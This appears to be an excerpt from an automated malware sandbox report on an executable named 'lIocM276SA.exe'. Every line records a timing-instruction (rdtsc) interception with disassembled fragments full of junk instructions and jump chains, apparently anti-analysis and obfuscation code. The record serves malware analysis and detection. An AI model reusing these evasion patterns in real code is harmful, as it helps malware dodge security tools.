Source: C:\Users\user\Desktop\lIocM276SA.exe	RDTSC instruction interceptor: First address: 4DD08A4 second address: 4DD08A8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\lIocM276SA.exe	RDTSC instruction interceptor: First address: 4DD08A8 second address: 4DD08AC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\lIocM276SA.exe	RDTSC instruction interceptor: First address: 4DD08AC second address: 4DD08B2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\lIocM276SA.exe	RDTSC instruction interceptor: First address: 4DD08B2 second address: 4DD08B8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\lIocM276SA.exe	RDTSC instruction interceptor: First address: 4DD08B8 second address: 4DD08CC instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 je 00007F7812D0590Ch 0x0000000e push eax 0x0000000f push edx 0x00000010 push eax 0x00000011 push edx 0x00000012 pushad 0x00000013 popad 0x00000014 rdtsc
Source: C:\Users\user\Desktop\lIocM276SA.exe	RDTSC instruction interceptor: First address: 4DD08CC second address: 4DD08D0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\lIocM276SA.exe	RDTSC instruction interceptor: First address: 4DD08D0 second address: 4DD08D6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\lIocM276SA.exe	RDTSC instruction interceptor: First address: 4DD08D6 second address: 4DD08DC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\lIocM276SA.exe	RDTSC instruction interceptor: First address: 4DD08DC second address: 4DD08E0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\lIocM276SA.exe	RDTSC instruction interceptor: First address: 4DD08E0 second address: 4DD08E4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\lIocM276SA.exe	RDTSC instruction interceptor: First address: 4DD08E4 second address: 4DD0917 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov ecx, eax 0x0000000a pushad 0x0000000b pushfd 0x0000000c jmp 00007F77A0BA286Dh 0x00000011 jmp 00007F77A0BA286Bh 0x00000016 popfd 0x00000017 mov ax, 416Fh 0x0000001b popad 0x0000001c xor eax, dword ptr [ebp+08h] 0x0000001f push eax 0x00000020 push edx 0x00000021 push eax 0x00000022 push edx 0x00000023 push eax 0x00000024 push edx 0x00000025 rdtsc
Source: C:\Users\user\Desktop\lIocM276SA.exe	RDTSC instruction interceptor: First address: 4DD0917 second address: 4DD091B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\lIocM276SA.exe	RDTSC instruction interceptor: First address: 4DD091B second address: 4DD091F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\lIocM276SA.exe	RDTSC instruction interceptor: First address: 4DD091F second address: 4DD0925 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\lIocM276SA.exe	RDTSC instruction interceptor: First address: 4DD0925 second address: 4DD093B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F77A0BA2872h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\lIocM276SA.exe	RDTSC instruction interceptor: First address: 4DD093B second address: 4DD093F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\lIocM276SA.exe	RDTSC instruction interceptor: First address: 4DD093F second address: 4DD097C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 and ecx, 1Fh 0x0000000b pushad 0x0000000c pushfd 0x0000000d jmp 00007F77A0BA286Dh 0x00000012 adc ah, 00000036h 0x00000015 jmp 00007F77A0BA2871h 0x0000001a popfd 0x0000001b mov edx, ecx 0x0000001d popad 0x0000001e ror eax, cl 0x00000020 pushad 0x00000021 popad 0x00000022 leave 0x00000023 push eax 0x00000024 push edx 0x00000025 push eax 0x00000026 push edx 0x00000027 push eax 0x00000028 push edx 0x00000029 rdtsc
Source: C:\Users\user\Desktop\lIocM276SA.exe	RDTSC instruction interceptor: First address: 4DD097C second address: 4DD0980 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\lIocM276SA.exe	RDTSC instruction interceptor: First address: 4DD0980 second address: 4DD099D instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F77A0BA2879h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\lIocM276SA.exe	RDTSC instruction interceptor: First address: 4DD099D second address: 4DD09A3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\lIocM276SA.exe	RDTSC instruction interceptor: First address: 4DD09A3 second address: 4DD0A13 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F77A0BA2873h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b retn 0004h 0x0000000e nop 0x0000000f mov esi, eax 0x00000011 lea eax, dword ptr [ebp-08h] 0x00000014 xor esi, dword ptr [00332014h] 0x0000001a push eax 0x0000001b push eax 0x0000001c push eax 0x0000001d lea eax, dword ptr [ebp-10h] 0x00000020 push eax 0x00000021 call 00007F77A5683165h 0x00000026 push FFFFFFFEh 0x00000028 jmp 00007F77A0BA2876h 0x0000002d pop eax 0x0000002e jmp 00007F77A0BA2870h 0x00000033 ret 0x00000034 nop 0x00000035 push eax 0x00000036 call 00007F77A5683188h 0x0000003b mov edi, edi 0x0000003d jmp 00007F77A0BA2870h 0x00000042 xchg eax, ebp 0x00000043 jmp 00007F77A0BA2870h 0x00000048 push eax 0x00000049 push eax 0x0000004a push edx 0x0000004b push eax 0x0000004c push edx 0x0000004d pushad 0x0000004e popad 0x0000004f rdtsc
Source: C:\Users\user\Desktop\lIocM276SA.exe	RDTSC instruction interceptor: First address: 4DD0A13 second address: 4DD0A19 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\lIocM276SA.exe	RDTSC instruction interceptor: First address: 4DD0A19 second address: 4DD0A1F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\lIocM276SA.exe	RDTSC instruction interceptor: First address: 4DD0A1F second address: 4DD0A23 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\lIocM276SA.exe	RDTSC instruction interceptor: First address: 4DD0A23 second address: 4DD0A5C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 xchg eax, ebp 0x00000009 push eax 0x0000000a push edx 0x0000000b pushad 0x0000000c movzx esi, di 0x0000000f pushfd 0x00000010 jmp 00007F77A0BA286Bh 0x00000015 adc ch, 0000004Eh 0x00000018 jmp 00007F77A0BA2879h 0x0000001d popfd 0x0000001e popad 0x0000001f rdtsc
Source: C:\Users\user\Desktop\lIocM276SA.exe	RDTSC instruction interceptor: First address: 4D800E5 second address: 4D800E9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\lIocM276SA.exe	RDTSC instruction interceptor: First address: 4D800E9 second address: 4D80104 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F77A0BA2877h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\lIocM276SA.exe	RDTSC instruction interceptor: First address: 4D80104 second address: 4D8010A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\lIocM276SA.exe	RDTSC instruction interceptor: First address: 4D8010A second address: 4D8010E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\lIocM276SA.exe	RDTSC instruction interceptor: First address: 4D8010E second address: 4D80112 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\lIocM276SA.exe	RDTSC instruction interceptor: First address: 4D80112 second address: 4D80121 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push eax 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e popad 0x0000000f rdtsc
Source: C:\Users\user\Desktop\lIocM276SA.exe	RDTSC instruction interceptor: First address: 4D80121 second address: 4D80134 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F77A0B95E0Fh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\lIocM276SA.exe	RDTSC instruction interceptor: First address: 4D80134 second address: 4D8013A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\lIocM276SA.exe	RDTSC instruction interceptor: First address: 4D8013A second address: 4D8013E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\lIocM276SA.exe	RDTSC instruction interceptor: First address: 4D8013E second address: 4D801AF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 xchg eax, ecx 0x00000009 pushad 0x0000000a pushad 0x0000000b pushad 0x0000000c popad 0x0000000d pushfd 0x0000000e jmp 00007F77A0BA2879h 0x00000013 or cl, FFFFFFA6h 0x00000016 jmp 00007F77A0BA2871h 0x0000001b popfd 0x0000001c popad 0x0000001d pushfd 0x0000001e jmp 00007F77A0BA2870h 0x00000023 sbb ax, A948h 0x00000028 jmp 00007F77A0BA286Bh 0x0000002d popfd 0x0000002e popad 0x0000002f xchg eax, ebx 0x00000030 pushad 0x00000031 mov ax, 41DBh 0x00000035 movzx esi, dx 0x00000038 popad 0x00000039 push eax 0x0000003a push eax 0x0000003b push edx 0x0000003c push eax 0x0000003d push edx 0x0000003e pushad 0x0000003f popad 0x00000040 rdtsc
Source: C:\Users\user\Desktop\lIocM276SA.exe	RDTSC instruction interceptor: First address: 4D801AF second address: 4D801B5 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\lIocM276SA.exe	RDTSC instruction interceptor: First address: 4D801B5 second address: 4D801BB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\lIocM276SA.exe	RDTSC instruction interceptor: First address: 4D801BB second address: 4D801BF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\lIocM276SA.exe	RDTSC instruction interceptor: First address: 4D801BF second address: 4D801D1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 xchg eax, ebx 0x00000009 push eax 0x0000000a push edx 0x0000000b pushad 0x0000000c mov edx, 3F3D4084h 0x00000011 popad 0x00000012 rdtsc
Source: C:\Users\user\Desktop\lIocM276SA.exe	RDTSC instruction interceptor: First address: 4D801D1 second address: 4D80228 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007F77A0B95E0Bh 0x00000009 adc al, FFFFFF9Eh 0x0000000c jmp 00007F77A0B95E19h 0x00000011 popfd 0x00000012 popad 0x00000013 pop edx 0x00000014 pop eax 0x00000015 mov ebx, dword ptr [ebp+10h] 0x00000018 jmp 00007F77A0B95E0Eh 0x0000001d xchg eax, esi 0x0000001e pushad 0x0000001f mov dx, si 0x00000022 jmp 00007F77A0B95E0Ah 0x00000027 popad 0x00000028 push eax 0x00000029 push eax 0x0000002a push edx 0x0000002b push eax 0x0000002c push edx 0x0000002d pushad 0x0000002e popad 0x0000002f rdtsc
Source: C:\Users\user\Desktop\lIocM276SA.exe	RDTSC instruction interceptor: First address: 4D80228 second address: 4D80244 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F77A0BA2878h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\lIocM276SA.exe	RDTSC instruction interceptor: First address: 4D80244 second address: 4D802DE instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F77A0B95E0Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, esi 0x0000000a jmp 00007F77A0B95E16h 0x0000000f mov esi, dword ptr [ebp+08h] 0x00000012 jmp 00007F77A0B95E10h 0x00000017 xchg eax, edi 0x00000018 pushad 0x00000019 mov edx, ecx 0x0000001b pushfd 0x0000001c jmp 00007F77A0B95E0Ah 0x00000021 xor cl, FFFFFFE8h 0x00000024 jmp 00007F77A0B95E0Bh 0x00000029 popfd 0x0000002a popad 0x0000002b push eax 0x0000002c pushad 0x0000002d mov ch, bl 0x0000002f pushad 0x00000030 pushfd 0x00000031 jmp 00007F77A0B95E0Eh 0x00000036 or eax, 4587FC48h 0x0000003c jmp 00007F77A0B95E0Bh 0x00000041 popfd 0x00000042 mov ah, 67h 0x00000044 popad 0x00000045 popad 0x00000046 xchg eax, edi 0x00000047 jmp 00007F77A0B95E0Bh 0x0000004c test esi, esi 0x0000004e push eax 0x0000004f push edx 0x00000050 pushad 0x00000051 mov bx, D966h 0x00000055 mov ecx, edx 0x00000057 popad 0x00000058 rdtsc
Source: C:\Users\user\Desktop\lIocM276SA.exe	RDTSC instruction interceptor: First address: 4D802DE second address: 4D80346 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F77A0BA2878h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 je 00007F7812D50B81h 0x0000000f jmp 00007F77A0BA2870h 0x00000014 cmp dword ptr [esi+08h], DDEEDDEEh 0x0000001b jmp 00007F77A0BA2870h 0x00000020 je 00007F7812D50B6Ah 0x00000026 push eax 0x00000027 push edx 0x00000028 jmp 00007F77A0BA2877h 0x0000002d rdtsc
Source: C:\Users\user\Desktop\lIocM276SA.exe	RDTSC instruction interceptor: First address: 4D80346 second address: 4D8036C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F77A0B95E19h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov edx, dword ptr [esi+44h] 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 pushad 0x00000011 popad 0x00000012 rdtsc
Source: C:\Users\user\Desktop\lIocM276SA.exe	RDTSC instruction interceptor: First address: 4D8036C second address: 4D80372 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\lIocM276SA.exe	RDTSC instruction interceptor: First address: 4D80372 second address: 4D80377 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\lIocM276SA.exe	RDTSC instruction interceptor: First address: 4D80377 second address: 4D80399 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 or edx, dword ptr [ebp+0Ch] 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007F77A0BA2876h 0x00000011 rdtsc
Source: C:\Users\user\Desktop\lIocM276SA.exe	RDTSC instruction interceptor: First address: 4D80399 second address: 4D803FA instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 movsx edi, si 0x00000006 pushfd 0x00000007 jmp 00007F77A0B95E0Ah 0x0000000c sbb esi, 6660F5B8h 0x00000012 jmp 00007F77A0B95E0Bh 0x00000017 popfd 0x00000018 popad 0x00000019 pop edx 0x0000001a pop eax 0x0000001b test edx, 61000000h 0x00000021 jmp 00007F77A0B95E16h 0x00000026 jne 00007F7812D440B3h 0x0000002c push eax 0x0000002d push edx 0x0000002e jmp 00007F77A0B95E17h 0x00000033 rdtsc
Source: C:\Users\user\Desktop\lIocM276SA.exe	RDTSC instruction interceptor: First address: 4D803FA second address: 4D8042F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov eax, ebx 0x00000005 mov esi, edx 0x00000007 popad 0x00000008 pop edx 0x00000009 pop eax 0x0000000a test byte ptr [esi+48h], 00000001h 0x0000000e pushad 0x0000000f mov ecx, edx 0x00000011 movsx ebx, ax 0x00000014 popad 0x00000015 jne 00007F7812D50AF8h 0x0000001b pushad 0x0000001c mov bh, 9Ah 0x0000001e popad 0x0000001f test bl, 00000007h 0x00000022 push eax 0x00000023 push edx 0x00000024 jmp 00007F77A0BA2871h 0x00000029 rdtsc
Source: C:\Users\user\Desktop\lIocM276SA.exe	RDTSC instruction interceptor: First address: 4D8042F second address: 4D8043F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F77A0B95E0Ch 0x00000009 rdtsc
Source: C:\Users\user\Desktop\lIocM276SA.exe	RDTSC instruction interceptor: First address: 4D70924 second address: 4D7092A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\lIocM276SA.exe	RDTSC instruction interceptor: First address: 4D7092A second address: 4D70930 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\lIocM276SA.exe	RDTSC instruction interceptor: First address: 4D70930 second address: 4D70934 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\lIocM276SA.exe	RDTSC instruction interceptor: First address: 4D70934 second address: 4D7094F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 jmp 00007F77A0B95E0Bh 0x0000000e xchg eax, ebp 0x0000000f pushad 0x00000010 pushad 0x00000011 mov edi, esi 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
Source: C:\Users\user\Desktop\lIocM276SA.exe	RDTSC instruction interceptor: First address: 4D7094F second address: 4D709C3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 mov cx, F283h 0x00000009 popad 0x0000000a mov ebp, esp 0x0000000c jmp 00007F77A0BA2876h 0x00000011 and esp, FFFFFFF8h 0x00000014 pushad 0x00000015 jmp 00007F77A0BA286Eh 0x0000001a pushfd 0x0000001b jmp 00007F77A0BA2872h 0x00000020 jmp 00007F77A0BA2875h 0x00000025 popfd 0x00000026 popad 0x00000027 xchg eax, ebx 0x00000028 jmp 00007F77A0BA286Eh 0x0000002d push eax 0x0000002e push eax 0x0000002f push edx 0x00000030 push eax 0x00000031 push edx 0x00000032 push eax 0x00000033 push edx 0x00000034 rdtsc
Source: C:\Users\user\Desktop\lIocM276SA.exe	RDTSC instruction interceptor: First address: 4D709C3 second address: 4D709C7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\lIocM276SA.exe	RDTSC instruction interceptor: First address: 4D709C7 second address: 4D709CD instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\lIocM276SA.exe	RDTSC instruction interceptor: First address: 4D709CD second address: 4D709F8 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F77A0B95E0Fh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebx 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007F77A0B95E15h 0x00000011 rdtsc
Source: C:\Users\user\Desktop\lIocM276SA.exe	RDTSC instruction interceptor: First address: 4D709F8 second address: 4D70A4E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007F77A0BA2877h 0x00000009 and eax, 62329D5Eh 0x0000000f jmp 00007F77A0BA2879h 0x00000014 popfd 0x00000015 pushad 0x00000016 popad 0x00000017 popad 0x00000018 pop edx 0x00000019 pop eax 0x0000001a xchg eax, esi 0x0000001b push eax 0x0000001c push edx 0x0000001d jmp 00007F77A0BA2873h 0x00000022 rdtsc
Source: C:\Users\user\Desktop\lIocM276SA.exe	RDTSC instruction interceptor: First address: 4D70A4E second address: 4D70B18 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 call 00007F77A0B95E0Fh 0x00000008 pop esi 0x00000009 movsx ebx, si 0x0000000c popad 0x0000000d pop edx 0x0000000e pop eax 0x0000000f push eax 0x00000010 jmp 00007F77A0B95E0Bh 0x00000015 xchg eax, esi 0x00000016 jmp 00007F77A0B95E16h 0x0000001b mov esi, dword ptr [ebp+08h] 0x0000001e pushad 0x0000001f pushfd 0x00000020 jmp 00007F77A0B95E0Eh 0x00000025 or ah, 00000048h 0x00000028 jmp 00007F77A0B95E0Bh 0x0000002d popfd 0x0000002e pushad 0x0000002f mov al, 46h 0x00000031 mov edi, 7FFB5FB6h 0x00000036 popad 0x00000037 popad 0x00000038 mov ebx, 00000000h 0x0000003d pushad 0x0000003e jmp 00007F77A0B95E18h 0x00000043 jmp 00007F77A0B95E12h 0x00000048 popad 0x00000049 test esi, esi 0x0000004b jmp 00007F77A0B95E10h 0x00000050 je 00007F7812D4B69Bh 0x00000056 push eax 0x00000057 push edx 0x00000058 jmp 00007F77A0B95E17h 0x0000005d rdtsc
Source: C:\Users\user\Desktop\lIocM276SA.exe	RDTSC instruction interceptor: First address: 4D70B18 second address: 4D70B8E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007F77A0BA286Fh 0x00000009 add esi, 4B4457AEh 0x0000000f jmp 00007F77A0BA2879h 0x00000014 popfd 0x00000015 mov ecx, 76009C37h 0x0000001a popad 0x0000001b pop edx 0x0000001c pop eax 0x0000001d cmp dword ptr [esi+08h], DDEEDDEEh 0x00000024 pushad 0x00000025 pushfd 0x00000026 jmp 00007F77A0BA2878h 0x0000002b sub ch, 00000058h 0x0000002e jmp 00007F77A0BA286Bh 0x00000033 popfd 0x00000034 popad 0x00000035 mov ecx, esi 0x00000037 push eax 0x00000038 push edx 0x00000039 pushad 0x0000003a pushad 0x0000003b popad 0x0000003c pushad 0x0000003d popad 0x0000003e popad 0x0000003f rdtsc
Source: C:\Users\user\Desktop\lIocM276SA.exe	RDTSC instruction interceptor: First address: 4D70B8E second address: 4D70B94 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\lIocM276SA.exe	RDTSC instruction interceptor: First address: 4D70B94 second address: 4D70C10 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 je 00007F7812D5806Dh 0x0000000e pushad 0x0000000f mov ecx, ebx 0x00000011 pushfd 0x00000012 jmp 00007F77A0BA2873h 0x00000017 or cx, A87Eh 0x0000001c jmp 00007F77A0BA2879h 0x00000021 popfd 0x00000022 popad 0x00000023 test byte ptr [76FB6968h], 00000002h 0x0000002a jmp 00007F77A0BA286Eh 0x0000002f jne 00007F7812D5802Eh 0x00000035 jmp 00007F77A0BA2870h 0x0000003a mov edx, dword ptr [ebp+0Ch] 0x0000003d push eax 0x0000003e push edx 0x0000003f pushad 0x00000040 mov bl, 6Eh 0x00000042 movzx ecx, dx 0x00000045 popad 0x00000046 rdtsc
Source: C:\Users\user\Desktop\lIocM276SA.exe	RDTSC instruction interceptor: First address: 4D70C10 second address: 4D70C30 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov di, cx 0x00000006 pushad 0x00000007 popad 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b xchg eax, ebx 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 jmp 00007F77A0B95E10h 0x00000015 rdtsc
Source: C:\Users\user\Desktop\lIocM276SA.exe	RDTSC instruction interceptor: First address: 4D70C30 second address: 4D70C3F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F77A0BA286Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\lIocM276SA.exe	RDTSC instruction interceptor: First address: 4D70C3F second address: 4D70C50 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov esi, ebx 0x00000005 mov cl, dh 0x00000007 popad 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f pushad 0x00000010 popad 0x00000011 rdtsc
Source: C:\Users\user\Desktop\lIocM276SA.exe	RDTSC instruction interceptor: First address: 4D70C50 second address: 4D70C56 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\lIocM276SA.exe	RDTSC instruction interceptor: First address: 4D70C56 second address: 4D70C66 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F77A0B95E0Ch 0x00000009 rdtsc
Source: C:\Users\user\Desktop\lIocM276SA.exe	RDTSC instruction interceptor: First address: 4D70C66 second address: 4D70CC5 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 xchg eax, ebx 0x00000009 pushad 0x0000000a pushad 0x0000000b movsx ebx, ax 0x0000000e movzx ecx, di 0x00000011 popad 0x00000012 call 00007F77A0BA2871h 0x00000017 mov cx, 3027h 0x0000001b pop esi 0x0000001c popad 0x0000001d push esi 0x0000001e pushad 0x0000001f jmp 00007F77A0BA2876h 0x00000024 mov eax, 3C665021h 0x00000029 popad 0x0000002a mov dword ptr [esp], ebx 0x0000002d push eax 0x0000002e push edx 0x0000002f jmp 00007F77A0BA2873h 0x00000034 rdtsc
Source: C:\Users\user\Desktop\lIocM276SA.exe	RDTSC instruction interceptor: First address: 4D70CC5 second address: 4D70CF7 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F77A0B95E19h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push dword ptr [ebp+14h] 0x0000000c pushad 0x0000000d mov cx, 1F73h 0x00000011 mov di, ax 0x00000014 popad 0x00000015 push dword ptr [ebp+10h] 0x00000018 push eax 0x00000019 push edx 0x0000001a push eax 0x0000001b push edx 0x0000001c push eax 0x0000001d push edx 0x0000001e rdtsc
Source: C:\Users\user\Desktop\lIocM276SA.exe	RDTSC instruction interceptor: First address: 4D70CF7 second address: 4D70CFB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\lIocM276SA.exe	RDTSC instruction interceptor: First address: 4D70CFB second address: 4D70D12 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F77A0B95E13h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\lIocM276SA.exe	RDTSC instruction interceptor: First address: 4D70DB5 second address: 4D70DB9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
